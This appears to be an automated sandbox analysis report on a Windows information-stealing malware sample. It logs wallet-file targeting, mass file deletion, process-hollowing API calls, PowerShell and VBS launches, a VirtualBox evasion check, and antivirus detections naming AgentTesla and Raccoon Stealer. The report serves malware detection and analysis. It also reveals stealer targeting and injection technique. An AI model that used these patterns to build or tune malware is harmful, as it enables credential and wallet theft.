
Appends a known multi-family ransomware file extension to files that have been encrypted (50 out of 95 events)

file	C:\Users\test22\AppData\Roaming\Identities\.wallet
file	C:\Users\test22\AppData\Roaming\Macromedia\wallets\.wallet
file	C:\Users\test22\AppData\Roaming\HNC\.wallet
file	C:\Users\test22\AppData\.wallet
file	C:\Users\test22\AppData\Roaming\wallets\.wallet
file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\Microsoft\wallets\.wallet
file	C:\Users\test22\AppData\Roaming\Macromedia\.wallet
file	C:\Users\test22\AppData\Roaming\Adobe\wallets\.wallet
file	C:\Users\test22\AppData\Roaming\HNC\wallets\.wallet
file	C:\Users\test22\AppData\Roaming\EditPlus\wallets\.wallet
file	C:\Users\test22\AppData\Roaming\Adobe\.wallet
file	C:\Users\test22\AppData\Roaming\.wallet
file	C:\Users\test22\AppData\wallets\.wallet
file	C:\Users\test22\AppData\Roaming\EditPlus\.wallet
file	C:\Users\test22\AppData\Roaming\Identities\wallets\.wallet
file	C:\Users\test22\AppData\Roaming\Microsoft\.wallet
file	C:\Python27\tcl\tcl8.5\encoding\euc-cn.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-3.enc
file	C:\Python27\tcl\tcl8.5\encoding\ascii.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp857.enc
file	C:\Python27\tcl\tcl8.5\encoding\macIceland.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1254.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-8.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp860.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp863.enc
file	C:\Python27\tcl\tcl8.5\encoding\ksc5601.enc
file	C:\Python27\tcl\tcl8.5\encoding\euc-kr.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1255.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-2.enc
file	C:\Python27\tcl\tcl8.5\encoding\macGreek.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp1256.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp949.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp437.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp775.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-14.enc
file	C:\Python27\tcl\tcl8.5\encoding\big5.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp950.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso2022-jp.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp869.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-5.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-9.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp874.enc
file	C:\Python27\tcl\tcl8.5\encoding\macRoman.enc
file	C:\Python27\tcl\tcl8.5\encoding\gb1988.enc
file	C:\Python27\tcl\tcl8.5\encoding\iso8859-15.enc
file	C:\Python27\tcl\tcl8.5\encoding\macDingbats.enc
file	C:\Python27\tcl\tcl8.5\encoding\macThai.enc
file	C:\Python27\tcl\tcl8.5\encoding\cp865.enc
file	C:\Python27\tcl\tcl8.5\encoding\jis0201.enc

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 158 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d5efd.TMP
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d9fbf.TMP
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d8f44.TMP
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d3f11.TMP
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d1ee7.TMP
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\nssckbi.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-stdio-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\breakpadinjector.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-namedpipe-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-timezone-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-convert-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\softokn3.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-libraryloader-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-process-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\IA2Marshal.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-handle-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-heap-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-math-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\MapiProxy_InUse.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-locale-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-string-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\libEGL.dll
file	C:\Users\test22\AppData\LocalLow\rQF69AzBla
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\lgpllibs.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-synch-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-utility-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\MapiProxy.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\prldap60.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\nss3.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\msvcp140.dll
file	C:\Users\test22\AppData\LocalLow\RYwTiizs2t
file	C:\Users\test22\AppData\LocalLow\foxmail.temp
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processthreads-l1-1-1.dll
file	C:\Users\test22\AppData\LocalLow\x3CF3EDNhm
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-interlocked-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\AccessibleMarshal.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\vcruntime140.dll
file	C:\Users\test22\AppData\LocalLow\YSMWwn8XZW8.zip
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-runtime-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-rtlsupport-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-util-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-filesystem-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-synch-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\mozglue.dll
file	C:\Users\test22\AppData\LocalLow\frAQBc8Wsa
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-private-l1-1-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-localization-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\chrome_urls.txt
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-file-l1-2-0.dll
file	C:\Users\test22\AppData\LocalLow\aD1rF3aM8r\mozMapi32.dll

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2768 resumed a thread in remote process 2716
Process injection	Process 2072 resumed a thread in remote process 1908
Process injection	Process 2552 resumed a thread in remote process 3324
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 2716	1	0	0
NtResumeThread Sept. 6, 2021, 6:20 p.m.	thread_handle: 0x000003a8 suspend_count: 1 process_identifier: 1908	1	0	0
NtResumeThread Sept. 6, 2021, 6:20 p.m.	thread_handle: 0x00000488 suspend_count: 1 process_identifier: 3324	1	0	0

Detects VirtualBox using WNetGetProviderName trick (1 event)

Time & API	Arguments	Status	Return	Repeated
WNetGetProviderNameW Sept. 6, 2021, 6:20 p.m.	net_type: 0x00250000		1222	0

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (50 out of 243 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2768	1	0
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2768	1	0
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2768	1	0
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x00000260 suspend_count: 1 process_identifier: 2768	1	0
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 2056 thread_handle: 0x000003d4 process_identifier: 3016 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003dc	1	1
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000003b0 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 2092 thread_handle: 0x000003d4 process_identifier: 2112 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003ec	1	1
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000003e0 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 2892 thread_handle: 0x000003ec process_identifier: 200 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000408	1	1
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000003f8 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 2716 thread_handle: 0x00000404 process_identifier: 1348 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000424	1	1
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x00000418 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 2936 thread_handle: 0x00000420 process_identifier: 1204 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000043c	1	1
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x00000430 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 1852 thread_handle: 0x0000043c process_identifier: 2356 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000454	1	1
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x00000448 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 2892 thread_handle: 0x00000454 process_identifier: 1868 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000046c	1	1
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x00000460 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 2876 thread_handle: 0x0000046c process_identifier: 2200 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000484	1	1
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x00000478 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 620 thread_handle: 0x00000484 process_identifier: 808 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000049c	1	1
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x00000490 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 1908 thread_handle: 0x0000049c process_identifier: 2668 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004b4	1	1
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000004a8 suspend_count: 1 process_identifier: 2768	1	0
NtGetContextThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2768	1	0
NtGetContextThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2768	1	0
NtGetContextThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2768	1	0
NtGetContextThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2768	1	0
NtGetContextThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 1452 thread_handle: 0x0000038c process_identifier: 2856 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\wscript.exe track: 1 command_line: "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\Dewgkwlbhkrsncbybkhtfpkb.vbs" filepath_r: C:\Windows\System32\WScript.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000390	1	1
CreateProcessInternalW Sept. 6, 2021, 6:19 p.m.	thread_identifier: 2612 thread_handle: 0x000002b0 process_identifier: 2716 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\ghjkl.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000450	1	1
NtGetContextThread Sept. 6, 2021, 6:19 p.m.	thread_handle: 0x000002b0	1	0
NtAllocateVirtualMemory Sept. 6, 2021, 6:19 p.m.	process_identifier: 2716 region_size: 598016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000450	1	0
WriteProcessMemory Sept. 6, 2021, 6:19 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $G[¡:ÏÉ:ÏÉ:ÏÉXRÌÈ:ÏÉXRÊÈ¿:ÏÉXRÈÈ:ÏÉQOËÈ:ÏÉQOÌÈ:ÏÉQOÊÈS:ÏÉXRËÈ:ÏÉXRÉÈ:ÏÉXRÎÈ:ÏÉ:ÎÉð:ÏÉ[OÆÈ:ÏÉ[OÍÈ:ÏÉRich:ÏÉPELìraà¢@wøÀ@ @BÀüQÈÔ8Õ@À°.text ¢ `.rdataâÀ¦@@.dataT`F>@À.relocüQÀR@B base_address: 0x00400000 process_identifier: 2716 process_handle: 0x00000450	1	1
WriteProcessMemory Sept. 6, 2021, 6:19 p.m.	buffer: base_address: 0x00401000 process_identifier: 2716 process_handle: 0x00000450	1	1
WriteProcessMemory Sept. 6, 2021, 6:19 p.m.	buffer: base_address: 0x0046c000 process_identifier: 2716 process_handle: 0x00000450	1	1
WriteProcessMemory Sept. 6, 2021, 6:19 p.m.	buffer: base_address: 0x00486000 process_identifier: 2716 process_handle: 0x00000450	1	1
WriteProcessMemory Sept. 6, 2021, 6:19 p.m.	buffer: base_address: 0x0048c000 process_identifier: 2716 process_handle: 0x00000450	1	1
WriteProcessMemory Sept. 6, 2021, 6:19 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2716 process_handle: 0x00000450	1	1

File has been identified by 44 AntiVirus engines on VirusTotal as malicious (44 events)

Lionic	Trojan.Win32.Malicious.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.37527736
FireEye	Generic.mg.b23d6c5698935797
ALYac	Trojan.GenericKD.37527736
Cylance	Unsafe
K7AntiVirus	Riskware ( 0040eff71 )
K7GW	Riskware ( 0040eff71 )
CrowdStrike	win/malicious_confidence_80% (W)
Cyren	W32/MSIL_Kryptik.DWR.gen!Eldorado
Symantec	Trojan.Gen.2
ESET-NOD32	a variant of MSIL/Kryptik.ACRJ
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan.MSIL.Chapak.gen
BitDefender	Trojan.GenericKD.37527736
Avast	Win32:MalwareX-gen [Trj]
Tencent	Msil.Trojan.Chapak.Pcin
Ad-Aware	Trojan.GenericKD.37527736
Sophos	Mal/Generic-S
Comodo	Malware@#2v9cxq8ha77ru
DrWeb	Trojan.Siggen15.5066
McAfee-GW-Edition	Artemis!Trojan
Emsisoft	Trojan.GenericKD.37527736 (B)
SentinelOne	Static AI - Malicious PE
Webroot	W32.Trojan.TE
Avira	TR/Chapak.ichjn
Antiy-AVL	Trojan/Generic.ASMalwS.348B6E4
Kingsoft	Win32.Troj.Undef.(kcloud)
Gridinsoft	Trojan.Win32.Kryptik.oa
Microsoft	Trojan:Win32/AgentTesla!ml
GData	Trojan.GenericKD.37527736
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.MalwareX-gen.C4622882
McAfee	AgentTesla-FDCV!B23D6C569893
MAX	malware (ai score=94)
Malwarebytes	Spyware.RaccoonStealer
Ikarus	Trojan.SuspectCRC
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Kryptik.ACNM!tr
BitDefenderTheta	Gen:NN.ZemsilF.34126.zn0@aS4NWFi
AVG	Win32:MalwareX-gen [Trj]
Cybereason	malicious.985001
Panda	Trj/GdSda.A

The processes powershell.exe, wscript.exe wrote an executable file to disk which it then attempted to execute (23 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\SysWOW64\wscript.exe
file	C:\Users\test22\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe
file	C:\Users\test22\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe

ghjkl.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All